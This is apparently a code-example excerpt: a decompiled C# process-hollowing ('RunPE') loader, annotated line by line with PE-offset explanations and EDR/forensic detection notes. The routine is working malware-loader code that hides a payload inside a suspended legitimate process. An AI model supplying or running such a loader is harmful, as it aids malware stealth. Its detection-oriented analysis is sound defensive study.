예제 #1
 // Token: 0x0600009E RID: 158 RVA: 0x000097EC File Offset: 0x000079EC
 /// <summary>
 /// Decompiled process-hollowing ("RunPE") routine. It starts <paramref name="surrogateProcess"/>
 /// suspended, unmaps the surrogate's own image, copies the PE held in <paramref name="bytes"/>
 /// into the surrogate at that PE's preferred ImageBase, patches the PEB image base and the main
 /// thread's entry register, then resumes the thread.
 /// Detection note: the API chain CreateProcess(CREATE_SUSPENDED) -> GetThreadContext ->
 /// NtUnmapViewOfSection -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory ->
 /// SetThreadContext -> ResumeThread is the canonical hollowing sequence that EDR/ETW-based
 /// rules key on; a resumed process whose in-memory image differs from its on-disk image is the
 /// memory-forensics indicator. The use of Microsoft.VisualBasic.Strings.Len and the
 /// "n - 1 + 1" array sizing suggest the original was written in VB.NET.
 /// </summary>
 /// <param name="bytes">Raw PE image to load. All header offsets below assume a 32-bit (PE32)
 /// image with the standard 0xE0-byte optional header; 64-bit images are not handled.</param>
 /// <param name="surrogateProcess">Command line of the process whose image gets replaced.</param>
 /// <param name="optionalArguments">Appended to the command line after a space when non-empty.</param>
 /// <returns>false if CreateProcess fails or any exception is thrown, otherwise true. A true
 /// return does not mean the injection succeeded: GetThreadContext/ReadProcessMemory/Unmap
 /// failures silently skip the write phase and the surrogate is resumed unchanged.</returns>
 public static bool InjectPE(byte[] bytes, string surrogateProcess, string optionalArguments = "")
 {
     try
     {
         // Reused as the NULL argument for security attributes and environment block.
         IntPtr             zero        = IntPtr.Zero;
         // Receives PROCESS_INFORMATION: [0] hProcess, [1] hThread, [2] dwProcessId, [3] dwThreadId.
         IntPtr[]           array       = new IntPtr[4];
         mRunpe.STARTUPINFO startupinfo = default(mRunpe.STARTUPINFO);
         // e_lfanew (DOS header offset 0x3C): file offset of the "PE\0\0" signature / NT headers.
         int    num   = BitConverter.ToInt32(bytes, 60);
         // IMAGE_FILE_HEADER.NumberOfSections (NT headers + 6).
         int    num2  = (int)BitConverter.ToInt16(bytes, num + 6);
         // IMAGE_OPTIONAL_HEADER32.SizeOfHeaders (NT headers + 84): byte count of the headers blob written first.
         IntPtr value = new IntPtr(BitConverter.ToInt32(bytes, num + 84));
         // Strings.Len on a struct returns its marshalled size (VB.NET idiom for sizeof).
         startupinfo.cb          = Strings.Len(startupinfo);
         // wShowWindow = SW_HIDE; dwFlags 257 = STARTF_USESHOWWINDOW (0x1) | STARTF_USESTDHANDLES (0x100).
         startupinfo.wShowWindow = 0;
         startupinfo.dwFlags     = 257;
         // Dead code: this Process object is never started or referenced again.
         Process process = new Process();
         process.StartInfo.CreateNoWindow = false;
         if (!string.IsNullOrEmpty(optionalArguments))
         {
             surrogateProcess = surrogateProcess + " " + optionalArguments;
         }
         // dwCreationFlags 4 = CREATE_SUSPENDED: the surrogate's main thread never runs its own code
         // before the image swap. CreateProcess failure is the only error path that reports false.
         if (!mRunpe.CreateProcess(null, new StringBuilder(surrogateProcess), zero, zero, false, 4, zero, null, ref startupinfo, array))
         {
             return(false);
         }
         // 179 * 4 = 716 bytes = sizeof(CONTEXT) on x86; array2[0] is ContextFlags.
         // 65538 = 0x10002 = CONTEXT_i386 | CONTEXT_INTEGER, so only Edi..Eax are fetched/applied.
         uint[] array2 = new uint[179];
         array2[0] = 65538u;
         if (mRunpe.GetThreadContext(array[1], array2))
         {
             // Index 41 is Ebx in the x86 CONTEXT layout. At process start Ebx holds the PEB
             // address; PEB + 8 is ImageBaseAddress, i.e. where the surrogate's image is mapped.
             IntPtr baseAddr = new IntPtr((long)((ulong)array2[41] + 8UL));
             IntPtr zero2    = IntPtr.Zero;
             IntPtr value2   = new IntPtr(4);
             IntPtr zero3    = IntPtr.Zero;
             // Read the surrogate's current image base (4 bytes), then unmap that view.
             // NtUnmapViewOfSection returning 0 (STATUS_SUCCESS) gates the whole write phase.
             if (mRunpe.ReadProcessMemory(array[0], baseAddr, ref zero2, (int)value2, ref zero3) && (ulong)mRunpe.NtUnmapViewOfSection(array[0], zero2) == 0UL)
             {
                 // OptionalHeader.ImageBase (NT + 52) and SizeOfImage (NT + 80) of the payload.
                 IntPtr intPtr        = new IntPtr(BitConverter.ToInt32(bytes, num + 52));
                 IntPtr intPtr2       = new IntPtr(BitConverter.ToInt32(bytes, num + 80));
                 // 12288 = 0x3000 = MEM_COMMIT | MEM_RESERVE; 64 = 0x40 = PAGE_EXECUTE_READWRITE.
                 // Allocation is requested at the payload's preferred base; the result is not
                 // checked and no relocation handling exists. A remote RWX allocation is a
                 // high-signal event for detection.
                 IntPtr lpBaseAddress = mRunpe.VirtualAllocEx(array[0], intPtr, intPtr2, 12288, 64);
                 // Declared but never assigned and passed by value: almost certainly a decompiler
                 // artifact of a ref/out lpNumberOfBytesWritten parameter.
                 int    lpNumberOfBytesWritten;
                 // Write the PE headers (SizeOfHeaders bytes) to the new base.
                 mRunpe.WriteProcessMemory(array[0], lpBaseAddress, bytes, (uint)((int)value), lpNumberOfBytesWritten);
                 // VB "For i = 0 To NumberOfSections - 1" after decompilation.
                 int num3 = num2 - 1;
                 int num4 = 0;
                 int num5 = num3;
                 for (int i = num4; i <= num5; i++)
                 {
                     // One IMAGE_SECTION_HEADER (40 bytes) per iteration, read as ten ints.
                     // NT + 248 (0xF8) is the first section header for a PE32 with a 0xE0 optional header.
                     int[] array3 = new int[10];
                     Buffer.BlockCopy(bytes, num + 248 + i * 40, array3, 0, 40);
                     // array3[4] = SizeOfRawData; "- 1 + 1" is a leftover of VB's ReDim(n - 1).
                     byte[] array4 = new byte[array3[4] - 1 + 1];
                     // array3[5] = PointerToRawData: copy the section's raw bytes out of the file image.
                     Buffer.BlockCopy(bytes, array3[5], array4, 0, array4.Length);
                     // array3[3] = VirtualAddress: destination is new base + section RVA.
                     // IntPtr.ToInt32 throws OverflowException on a 64-bit pointer, which the
                     // catch below turns into a false return.
                     intPtr2 = new IntPtr(lpBaseAddress.ToInt32() + array3[3]);
                     intPtr  = new IntPtr(array4.Length);
                     mRunpe.WriteProcessMemory(array[0], intPtr2, array4, (uint)((int)intPtr), lpNumberOfBytesWritten);
                 }
                 // Overwrite PEB.ImageBaseAddress (Ebx + 8) with the new base so the loader
                 // resolves the swapped image.
                 intPtr2 = new IntPtr((long)((ulong)array2[41] + 8UL));
                 intPtr  = new IntPtr(4);
                 mRunpe.WriteProcessMemory(array[0], intPtr2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint)((int)intPtr), lpNumberOfBytesWritten);
                 // Index 44 is Eax in the x86 CONTEXT layout, which at this point holds the entry
                 // point the loader will jump to; redirect it to new base + AddressOfEntryPoint (NT + 40).
                 array2[44] = (uint)(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num + 40));
                 // Return value unchecked.
                 mRunpe.SetThreadContext(array[1], array2);
             }
         }
         // Fixed one-second delay before the thread is released; return value of ResumeThread unchecked.
         Thread.Sleep(1000);
         mRunpe.ResumeThread(array[1]);
     }
     catch (Exception ex)
     {
         // Every failure (bad offsets, overflow, access denied) collapses to false; ex is never used.
         return(false);
     }
     return(true);
 }
예제 #2
 /// <summary>
 /// P/Invoke declaration for Win32 CreateProcess (the [DllImport] attribute that normally precedes
 /// it is not part of this excerpt). <paramref name="creation"/> is dwCreationFlags, which the
 /// InjectPE routine in example #1 sets to 4 (CREATE_SUSPENDED); <paramref name="pInfo"/> is a
 /// four-element IntPtr array standing in for PROCESS_INFORMATION (hProcess, hThread,
 /// dwProcessId, dwThreadId), presumably marshalled as an [Out] buffer. <paramref name="commandLine"/>
 /// is a StringBuilder because CreateProcessW may modify the command-line buffer in place.
 /// Detection note: CREATE_SUSPENDED on its own is common and benign (debuggers, launchers); the
 /// signal is its combination with the remote memory writes and SetThreadContext that follow.
 /// </summary>
 private static extern bool CreateProcess(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, [In] ref mRunpe.STARTUPINFO lpStartupInfo, IntPtr[] pInfo);